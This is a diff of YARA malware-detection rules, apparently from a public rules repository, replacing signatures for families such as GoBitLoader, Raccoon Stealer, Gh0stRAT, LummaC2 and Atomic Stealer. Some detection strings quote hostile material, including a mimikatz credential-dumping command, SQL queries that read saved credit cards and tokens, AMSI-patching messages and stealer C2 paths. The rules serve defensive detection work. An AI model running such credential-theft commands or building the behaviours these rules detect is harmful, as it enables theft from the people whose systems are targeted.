-rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE
+rule RUSSIANPANDA_Textshell : FILE
 {
 	meta:
-		description = "Detects GoBitLoader"
+		description = "Detects TextShell Obfsucator"
 		author = "RussianPanda"
-		id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36"
-		date = "2024-03-24"
-		modified = "2024-03-24"
-		reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13"
+		id = "48fe49be-a76e-5e6c-a69f-acbe73f4d175"
+		date = "2025-10-31"
+		modified = "2025-11-02"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VanillaTempest/win_mal_TextShell.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3"
+		hash = "cf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a"
+		logic_hash = "c8f84d7160d8cb3b76d06170af09c921893b6f4cd073a10b399d8f51199cef40"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64}
-		$s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73}
-		$s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31}
+		$s1 = {41 8B 04 84 48 03 ?? EB}
+		$s2 = {41 3B ?? 74 ?? FF C3 3B 5D 18 72}
+		$s3 = {FF 15 ?? ?? ?? ?? 48 8B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them and #s3 > 1000
 }
-rule RUSSIANPANDA_Garystealer : FILE
+rule RUSSIANPANDA_Kaiji_Ares : FILE
 {
 	meta:
-		description = "Detects GaryStealer 1-3-2024"
+		description = "Detects a Variant of Kaiji (Ares) observed during React2Shell exploitation"
 		author = "RussianPanda"
-		id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab"
-		date = "2024-01-03"
-		modified = "2024-01-03"
-		reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GaryStealer/garystealer-1-3-2024.yar#L1-L20"
+		id = "02bcbd60-fc14-5764-a456-061a9a6aea32"
+		date = "2025-12-08"
+		modified = "2025-12-09"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Kaiji/mal_linux_kaiji_ares.yar#L1-L13"
 		license_url = "N/A"
-		hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435"
-		logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15"
+		hash = "c79fcb6c433d8a613f25b9b4c81c1c2514ac97e9aaae7c7c84a432b2476b5e4e"
+		logic_hash = "73d1e00deb6e0d3f78ebc8a19b237df5e869237717b62557abbc652efe000155"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63}
-		$s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d}
-		$s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64}
-		$s4 = {C7 40 28 ?? 00 00 00}
+		$s1 = "C:/src/client/linux/ares_tcp.go"
+		$s2 = {E5 BC BA E5 88 B6 55 64 70}
+		$s3 = {B0 81 E5 8C 85}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) and filesize < 20MB and #s4 > 2
+		uint32( 0 ) == 0x464c457f and 2 of them
 }
-rule RUSSIANPANDA_Truecrypt_Crypter : FILE
+rule RUSSIANPANDA_Johnwalkertexasloader_V2 : FILE
 {
 	meta:
-		description = "Detects TrueCrypt crypter"
+		description = "Detects JohnWalkerTexasLoader (JWTL)"
 		author = "RussianPanda"
-		id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07"
-		date = "2024-01-06"
-		modified = "2024-01-06"
+		id = "1a05245e-5ee0-5916-801b-4f7f3a573e71"
+		date = "2024-10-15"
+		modified = "2024-10-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/TrueCrypt/truecrypt_crypter.yar#L1-L27"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JWTL/JohnWalkerTexasLoader_v2.yar#L1-L16"
 		license_url = "N/A"
-		hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60"
-		logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7"
+		hash = "9f6bf0473f5541d84faad4c33a0bc5b1928fceb5938f2d6a7e6e02b7f0980341"
+		logic_hash = "70cbf6cf0602dc8087f4845451d13d0043872733615050161c077e3346387873"
 		score = 75
 		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1_crpt1 = {77 69 6E 65 5F 67 65 74}
-		$s2_crpt1 = {49 3B 66 10 76}
-		$s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF}
-		$s3_crpt1 = {49 3B 66 10 76 43}
-		$s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18}
-		$s4_crpt1 = {40 C0 EE 04 [16] 48 83}
-		$s4_crpt2 = {FA 20 [0-22] 48 83 FE 20}
-		$a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67}
-		$s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74}
+		$s1 = {61 00 48 00 52 00 30 00 63 00 48 00 4D 00 36 00 4C 00 79 00 39}
+		$s2 = {73 65 6E 64 6F 70 65 6E 31}
+		$s3 = {73 65 6E 64 6F 70 65 6E 32}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize < 7MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Neptune_Loader : FILE
+rule RUSSIANPANDA_Johnwalkertexasloader : FILE
 {
 	meta:
-		description = "Detects Neptune Loader"
+		description = "Detects JohnWalkerTexasLoader (JWTL)"
 		author = "RussianPanda"
-		id = "d576bf47-10bd-55d0-99b0-69c02dc87f17"
-		date = "2024-01-17"
-		modified = "2024-01-21"
+		id = "af91ab47-245b-58f2-a35a-1cb408b2229a"
+		date = "2024-10-10"
+		modified = "2024-10-10"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/NeptuneLoader/neptune_loader.yar#L1-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JWTL/JohnWalkerTexasLoader.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb"
+		hash = "3784fc39dc5c0dec08ad0a49bbbb990359e313a9fa87e6842fd67ed7cc1c0baa"
+		logic_hash = "414be3219d12823639d140d132a9bbc2ca7bf8c44d0c560e4a49b76323be3f8a"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B C6 E8 F4 FB FF FF}
-		$s2 = {66 33 D1 66 89 54 58 FE}
-		$s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C}
-		$s4 = {44 65 6C 70 68 69}
-		$t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00}
-		$t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00}
-		$t3 = {8B ?? ?? FF D0 B8}
+		$s1 = "?status=1&wallets=" ascii wide
+		$s2 = "/api.php" ascii wide
+		$s3 = "/api-debug.php" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) or 2 of ( $t* ) and filesize < 6MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE
+rule RUSSIANPANDA_Atomic_Stealer : FILE
 {
 	meta:
-		description = "Detects XRed backdoor"
+		description = "Detects Atomic Stealer targering MacOS"
 		author = "RussianPanda"
-		id = "61f5fcb8-9351-5db0-8bce-123c96d2a443"
-		date = "2024-02-09"
-		modified = "2024-02-09"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18"
+		id = "259c5c33-0164-568f-aec4-4fe0a2c6d015"
+		date = "2024-01-13"
+		modified = "2024-01-17"
+		reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AtomicStealer/Atomic_Stealer.yar#L1-L27"
 		license_url = "N/A"
-		hash = "9e1fbae3a659899dde8db18a32daa46a"
-		logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5"
+		hash = "dd8aa38c7f06cb1c12a4d2c0927b6107"
+		logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5"
 		score = 75
-		quality = 73
+		quality = 58
 		tags = "FILE"
 
 	strings:
-		$s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65}
-		$s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66}
-		$s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65}
-		$s4 = {45 58 45 55 52 4C 31}
-		$s5 = {49 4E 49 55 52 4C 33}
-		$s6 = {58 52 65 64 35 37}
+		$s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85}
+		$s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00}
+		$t1 = {80 75 D?}
+		$t2 = {0F 57 05 ?? 1B 01 00}
+		$t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01}
+		$c1 = {28 ?? 40 39}
+		$c2 = {64 65 73 6B 77 61 6C 6C 65 74 73}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and all of ( $s* ) and #s1 > 60 and #s2 > 100 or ( all of ( $t* ) and #t1 > 10 and #t2 > 5 ) or ( #c1 > 200 and $c2 )
 }
-rule RUSSIANPANDA_AMOS_Stealer : FILE
+rule RUSSIANPANDA_Raccoonstealer : FILE
 {
 	meta:
-		description = "Detects AMOS Stealer"
+		description = "Detects Raccoon Stealer v2.3.1.1"
 		author = "RussianPanda"
-		id = "f2abe03e-7a29-514d-9125-9ec9d0875179"
-		date = "2025-03-31"
-		modified = "2025-04-11"
+		id = "29f28cd5-370b-5831-8b71-a253f468f7e4"
+		date = "2024-01-08"
+		modified = "2024-01-08"
+		reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20"
+		license_url = "N/A"
+		hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb"
+		logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = {8B 0D [2] 41 00 A3 [3] 00}
+		$s2 = "MachineGuid"
+		$s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards"
+		$s4 = "SELECT service, encrypted_token FROM token_service"
+		$s5 = "&configId="
+		$s6 = "machineId="
+
+	condition:
+		all of ( $s* ) and #s1 > 10 and uint16( 0 ) == 0x5A4D and filesize < 5MB
+}
+rule RUSSIANPANDA_Raccoonstealerv2 : FILE
+{
+	meta:
+		description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
+		author = "RussianPanda"
+		id = "eda6216a-219b-5f60-8084-4c0c240a4cb4"
+		date = "2023-04-17"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AMOS/amos_stealer.yar#L1-L24"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14"
 		license_url = "N/A"
-		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
-		logic_hash = "64bf0753e2696633ed255df9350a01cb1e75fd6e6c0d4fe48194927acf7e2363"
+		logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e"
+		score = 50
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
+		$pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
+		$pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
+		$m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
+		$m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
+
+	condition:
+		2 of ( $pattern* ) and uint16( 0 ) == 0x5A4D and 1 of ( $m* ) and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB
+}
+rule RUSSIANPANDA_Gh0Strat : FILE
+{
+	meta:
+		description = "Detects Gh0stRAT"
+		author = "RussianPanda"
+		id = "db310549-feed-57b8-9ec0-232b6eda62f9"
+		date = "2024-07-09"
+		modified = "2024-07-09"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Gh0stRAT/Gh0stRAT.yar#L1-L14"
+		license_url = "N/A"
+		hash = "678b06ecdbc9b186788cf960332566f9"
+		logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = {E8 ?? ?? ?? ?? E9 00 00 00 00 48 8D}
-		$op2 = {48 3B 85 68 FF FF FF 0F 83 03 01 00 00 C6 85 5F FF FF FF 00 C7 85 58 FF FF FF 00 00 00 00}
+		$s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s"
+		$s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit"
+		$s3 = "Http/1.1 403 Forbidden"
+		$s4 = "WinSta0\\Default"
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 5000 and $op2 )
+		uint16( 0 ) == 0x5A4D and all of them
+}
+rule RUSSIANPANDA_Zharkbot : FILE
+{
+	meta:
+		description = "Detects ZharkBot"
+		author = "RussianPanda"
+		id = "54213d76-7e27-559d-b653-5390a0c6813c"
+		date = "2024-01-21"
+		modified = "2024-03-12"
+		reference = "https://x.com/ViriBack/status/1749184882822029564?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZharkBot/zharkbot.yar#L1-L15"
+		license_url = "N/A"
+		hash = "d53ce8c0a8a89c2e3eb080849da8b1c47eaac614248fc55d03706dd5b4e10bdd"
+		logic_hash = "ffaec6b19dd4385cd1bc156fdfde39a356367c7fba4135c48a8de62a18a78576"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = {F7 EA C1 FA 04 8B C2 C1 E8 1F 03 C2 8B 55 ?? 0F BE C0 8A CA 6B C0 ?? 2A C8 80 C1}
+		$s2 = {F7 E2 C1 EA 04 0F BE C2 8B 55 ?? 8A CA 6B C0 ?? 2A C8 80 C1 ?? 30 8C 15}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and #s1 > 3 and #s2 > 3 and filesize < 500KB
 }
-rule RUSSIANPANDA_AMOS_Stealer_1 : FILE
+rule RUSSIANPANDA_Zharkbot_1 : FILE
 {
 	meta:
-		description = "Detects AMOS Stealer"
+		description = "Detects ZharkBot, version 1.2.5"
 		author = "RussianPanda"
-		id = "481c0abc-efa6-5965-a5b8-0164229130e1"
-		date = "2025-04-11"
-		modified = "2025-04-11"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AMOS/amos_stealer_4_25.yar#L1-L24"
+		id = "e20875ed-a0a1-5ac8-8758-33766c522c17"
+		date = "2024-09-02"
+		modified = "2024-09-03"
+		reference = "https://research.openanalysis.net/zharkbot/triage/x64dbg/2024/09/02/zharkbot-config.html"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZharkBot/Zharkbot.yar#L1-L15"
 		license_url = "N/A"
-		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
-		logic_hash = "dffaf67bdfb8db07f69fb00720a6638e7a89db2acc1d848d635031a0aec5bdd3"
+		hash = "1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109"
+		logic_hash = "fded6a0c7af4fda13619778669ef619f88b43e12f12284a3c551c4fddac01024"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = {E8 ?? ?? ?? ?? EB 00 48 8D}
-		$op2 = {48 8D BD ?? ?? FF FF E8 ?? ?? 00 00 48 8D BD}
+		$s1 = "^[a-z]{8}$"
+		$s2 = "^d{6}$"
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 50000 and #op2 > 4 )
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
 }
-rule RUSSIANPANDA_Mal_Cleanuploader : FILE
+rule RUSSIANPANDA_Peerblight : FILE
 {
 	meta:
-		description = "Detects CleanUpLoader"
+		description = "Detects PeerBlight backdoor"
 		author = "RussianPanda"
-		id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31"
-		date = "2024-02-14"
-		modified = "2024-02-14"
-		reference = "https://x.com/AnFam17/status/1757871703282077857?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/CleanUpLoader/mal_cleanuploader.yar#L1-L14"
+		id = "8fdae13c-0a81-517d-9f6d-667c5db59621"
+		date = "2025-12-07"
+		modified = "2025-12-07"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PeerBlight/linux_mal_PeerBlight.yar#L1-L16"
 		license_url = "N/A"
-		hash = "2b62dd154b431d8309002d5b4a35de07"
-		logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a"
+		hash = "a605a70d031577c83c093803d11ec7c1e29d2ad530f8e95d9a729c3818c7050d"
+		logic_hash = "5bc60656c333c63aa869c1c94bbb2aa2802c4132ab988a08b50aad146ca6a23e"
 		score = 75
-		quality = 83
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$s1 = {0F B6 80 30 82 42 00 88}
-		$s2 = {44 69 73 6B 43 6C 72}
-		$s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65}
+		$s1 = "/bin/systemd-daemon"
+		$s2 = "/lib/systemd/system/systemd-agent.service"
+		$s3 = "group"
+		$s4 = "tag"
+		$s5 = "arch"
+		$s6 = "softirq"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s1 > 15
+		uint32( 0 ) == 0x464c457f and 5 of them
 }
-rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE
+rule RUSSIANPANDA_Lummac2 : FILE
 {
 	meta:
-		description = "Detects malicious msedge.dll file"
+		description = "Detects LummaC2 Stealer"
 		author = "RussianPanda"
-		id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff"
-		date = "2024-01-19"
-		modified = "2024-01-19"
-		reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/virusloader/mal_msedge_dll_virusloader.yar#L1-L16"
+		id = "94d6b63f-066e-59d2-9d14-24c5d5219ba8"
+		date = "2024-09-12"
+		modified = "2024-09-12"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LummaC2/LummaC2.yar#L1-L14"
 		license_url = "N/A"
-		hash = "ab2e3b07170ef1516af3af0d03388868"
-		logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803"
+		hash = "988f54f9694dd1ae701bacec3b83c752"
+		logic_hash = "875709f48ff93c8e986f3c1d2e32268bf3458d870082072e7727d8ec85b1a021"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {C6 85 ?? FE FF FF ?? C6}
-		$s2 = {C7 85 ?? FD FF FF}
-		$s3 = {BF 60 01 00 00 [18] 30 04 39 41}
+		$s1 = {0F B6 [2-6] 83 ?? 1F}
+		$s2 = {F3 A5 8B 74 24 F8 8B 7C 24 F4 8D 54 24 04 FF 54 24 FC C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* ) and #s1 > 30 and #s2 > 30 and filesize < 300KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Gh0Strat : FILE
+rule RUSSIANPANDA_Win_Mal_Pregrabber : FILE
 {
 	meta:
-		description = "Detects Gh0stRAT"
+		description = "Detects Pregrabber Plugin"
 		author = "RussianPanda"
-		id = "db310549-feed-57b8-9ec0-232b6eda62f9"
-		date = "2024-07-09"
-		modified = "2024-07-09"
+		id = "a7e5bf1d-b25e-5c46-b191-ee7de13b24e5"
+		date = "2025-02-13"
+		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Gh0stRAT/Gh0stRAT.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_PreGrabber.yar#L1-L17"
 		license_url = "N/A"
-		hash = "678b06ecdbc9b186788cf960332566f9"
-		logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5"
+		hash = "f39319312a567fa771921d11ece66f3ce8996ba45f90d6fc89031b621535eb7e"
+		logic_hash = "4fcf9c71d7e6b8b571f8452a19ccf0be6153def54ce6148915535a54711b0ff0"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s"
-		$s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit"
-		$s3 = "Http/1.1 403 Forbidden"
-		$s4 = "WinSta0\\Default"
+		$s1 = "msgPack"
+		$s2 = "HandlePreGrabber"
+		$s3 = "bdos"
+		$s4 = "uniqueid"
+		$s5 = "mtx"
+		$s6 = "install"
+		$s7 = "mscoree.dll"
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Weyhroc2 : FILE
+rule RUSSIANPANDA_Win_Mal_Chromium_App_Bound_Encryption_Decrypter : FILE
 {
 	meta:
-		description = "Detects Weyhro C2"
+		description = "Detects Potential Chromium app_bound_encryption key Decrypter"
 		author = "RussianPanda"
-		id = "228bc7be-ebe0-5dcd-aaf3-be0bf5aa6e1b"
-		date = "2025-12-04"
-		modified = "2025-12-05"
-		reference = "https://x.com/RussianPanda9xx/status/1996258417476837746?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WeyhroC2/win_mal_weyhroc2.yar#L1-L15"
+		id = "f3c500cb-52d1-5e89-a927-36da6246d2cb"
+		date = "2025-02-13"
+		modified = "2025-02-14"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_Chromium_app_bound_encryption_Decrypter.yar#L1-L26"
 		license_url = "N/A"
-		hash = "ec4ab4e4d700c9e5fdda59eb879a2bf18d0eefd825539d64677144d43a744cee"
-		logic_hash = "fe15c701afd3f7bc6ecd0f1d228f158f4cec5d0ad8932f0014e4d78ca7427f43"
+		hash = "0f4dcfd8c9ada67a9b41033fc715d370399fd74ca94dbb8a1ea45b3785c88d02"
+		logic_hash = "e871c9a6762c38baeed287e9350530c2c3cd02333b1830210ef74c258bd223b9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "AMSI patch skipped"
-		$s2 = "AMSI patched successfully"
-		$s3 = "IAT unhook successful"
-		$s4 = "Inline unhook successful"
+		$op_chr_1 = {E0 60 88 70 41 F6 11 46}
+		$op_chr_2 = {88 95 7D 86 7D D3 67 5B}
+		$op_chr_3 = {CF BE 3A 46 0D 41 7F 40}
+		$op_chr_4 = {8A F5 0D F3 5A 00 5C C8}
+		$op_br_1 = {AF 31 6B 57 69 63 6B 4B}
+		$op_br_2 = {85 60 E4 B2 03 A9 7A 8B}
+		$op_br_3 = {1E 86 96 F3 8E 0C 71 4C}
+		$op_br_4 = {82 56 2F AE 6D 75 9C E9}
+		$op_edg_1 = {6C E9 CB 1F 97 16 AF 43}
+		$op_edg_2 = {91 40 28 97 C7 C6 97 67}
+		$op_edg_3 = {07 B8 C2 C9 31 77 34 4F}
+		$op_edg_4 = {81 B7 44 FF 77 79 52 2B}
+		$riid1 = {CF BE 3A 46 0D 41 7F 40 8A F5 0D F3 5A 00 5C C8}
+		$riid2 = {1E 86 96 F3 8E 0C 71 4C 82 56 2F AE 6D 75 9C E9}
+		$dll1 = "CoCreateInstance"
+		$dll2 = "CoInitializeEx"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of ( $dll* ) and all of ( $riid* ) and 8 of ( $op_* )
 }
-rule RUSSIANPANDA_Supperbackdoor
+rule RUSSIANPANDA_Win_Mal_Formgrabber : FILE
 {
 	meta:
-		description = "Detects Supper backdoor"
+		description = "Detects Formgrabber Plugin"
 		author = "RussianPanda"
-		id = "bd2752c3-1072-5151-9bb9-dd094feb0772"
-		date = "2025-10-31"
-		modified = "2025-11-02"
+		id = "818405a9-4348-5c4a-a4d1-e35b4f525e25"
+		date = "2025-02-13"
+		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VanillaTempest/win_mal_SupperBackdoor.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_Formgrabber.yar#L1-L14"
 		license_url = "N/A"
-		hash = "bf2ba1f30ef8ca6f9946f6ec21118eff3c3442590bbedea150e2d670e78ab986"
